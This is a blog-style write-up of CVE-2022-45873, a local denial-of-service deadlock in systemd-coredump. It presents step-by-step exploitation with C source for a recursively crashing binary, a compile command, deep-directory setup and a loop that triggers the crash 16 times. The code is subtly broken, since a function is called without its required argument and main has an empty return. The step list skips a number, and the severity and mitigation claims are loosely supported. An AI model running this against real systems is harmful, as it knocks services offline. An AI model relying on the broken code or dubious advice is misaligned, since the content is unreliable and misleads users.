CVE-2022-45873 - Local systemd-coredump deadlock exploit in systemd 250 and 251

A recent vulnerability has been uncovered in systemd versions 250 and 251, identified as CVE-2022-45873, which allows local users to achieve a systemd-coredump deadlock by triggering a crash with a long backtrace. This exploit takes advantage of a weak point in the parse_elf_object function found in the shared/elf-util.c file. In this post, we'll delve into the details of this vulnerability, provide code snippets, and offer reference links for further understanding and mitigation.

The exploitation methodology for this vulnerability can be broken down into the following steps

1. Create a binary that crashes by calling a function recursively, leading to a stack overflow and causing a crash.

Place the binary in a deeply nested directory to ensure a long backtrace for the crash.

3. Trigger the crash 16 times when the MaxConnections=16 setting is configured for the systemd/units/systemd-coredump.socket file.

By doing this, an attacker can force a local deadlock in the systemd-coredump process, effectively rendering a targeted system unresponsive.

To create a binary that will crash by calling a function recursively, you can use this simple C code

#include <stdio.h>

void recursive_function(int counter) {
    printf("Recursion level: %d\n", counter);
    recursive_function(counter + 1);
}

int main() {
    recursive_function();
    return ;
}

Compile this code with gcc

gcc -o recursive_crash recursive_crash.c

To make the backtrace larger, move this binary to a deeply nested directory

mkdir -p a/a/a/a/a/a/a
mv recursive_crash a/a/a/a/a/a/a/

Now, run the binary multiple times to trigger the crash

for i in {1..16}; do
    ./a/a/a/a/a/a/a/recursive_crash
done

This vulnerability was discovered and reported by the following sources

1. The original disclosure of the vulnerability can be found at MITRE
2. The systemd GitHub repository provides further details on the vulnerable code: systemd GitHub
3. The National Vulnerability Database (NVD) provides technical details and impact analysis: NVD - CVE-2022-45873

Mitigation

As of now, there is no official fix released for this vulnerability. However, one possible mitigation is to lower the MaxConnections setting for the systemd-coredump.socket file to reduce the attack surface. Moreover, it is advisable to monitor process crashes closely and investigate any abnormal behavior. Monitor for any official patches or updates addressing this issue and make sure to apply them as soon as possible.

Conclusion

CVE-2022-45873 is a critical vulnerability that affects systemd versions 250 and 251. By leveraging a local user's capabilities, an attacker can force a deadlock in the systemd-coredump process and potentially halt a targeted system entirely. It's vital for systems administrators and security professionals to stay vigilant, watch out for updates, and apply any mitigating measures in the interim to prevent potential exploitation.

Timeline

Published on: 11/23/2022 23:15:00 UTC
Last modified on: 03/01/2023 14:27:00 UTC